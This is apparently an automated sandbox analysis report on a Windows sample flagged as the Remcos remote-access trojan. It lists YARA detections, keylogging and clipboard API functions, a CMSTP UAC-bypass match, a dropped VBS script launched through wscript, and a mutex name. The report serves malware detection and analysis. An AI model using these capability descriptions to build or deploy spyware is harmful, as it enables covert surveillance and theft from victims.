                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpT

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000000_2_0040A2B8
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\xi0TpAxHGMsm.exeJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004168C1
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,0_2_0040B70E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A3E0

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\Disk\Disk.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041C9E2 SystemParametersInfoW,0_2_0041C9E2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_004132D2
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041BB09
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,0_2_0041BB35
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004167B4
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0043E0CC0_2_0043E0CC
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041F0FA0_2_0041F0FA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004541590_2_00454159
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004381680_2_00438168
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004461F00_2_004461F0
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0043E2FB0_2_0043E2FB
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0045332B0_2_0045332B
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0042739D0_2_0042739D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004374E60_2_004374E6
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0043E5580_2_0043E558
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004387700_2_00438770
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004378FE0_2_004378FE
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004339460_2_00433946
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0044D9C90_2_0044D9C9
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00427A460_2_00427A46
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041DB620_2_0041DB62
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00427BAF0_2_00427BAF
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00437D330_2_00437D33
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00435E5E0_2_00435E5E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00426E0E0_2_00426E0E
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0043DE9D0_2_0043DE9D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00413FCA0_2_00413FCA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00436FEA0_2_00436FEA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: String function: 00434E10 appears 54 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: String function: 00434770 appears 42 times
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: String function: 00401E65 appears 35 times
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs xi0TpAxHGMsm.exe
                    Source: xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000072A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs xi0TpAxHGMsm.exe
                    Source: xi0TpAxHGMsm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: xi0TpAxHGMsm.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00417952
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F474
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B4A8
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].jsonJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-4QQORA
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbsJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Software\0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Rmc-4QQORA0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Exe0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Exe0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Rmc-4QQORA0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Inj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Inj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Pj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Pj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Pj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: 8SG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Pj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: exepath0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: 8SG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: exepath0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Pj0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: licence0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: dMG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: PSG0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: Administrator0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: User0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: del0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: del0_2_0040E9C5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCommand line argument: del0_2_0040E9C5
                    Source: xi0TpAxHGMsm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\xi0TpAxHGMsm.exe "C:\Users\user\Desktop\xi0TpAxHGMsm.exe"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs"
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" Jump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: xi0TpAxHGMsm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
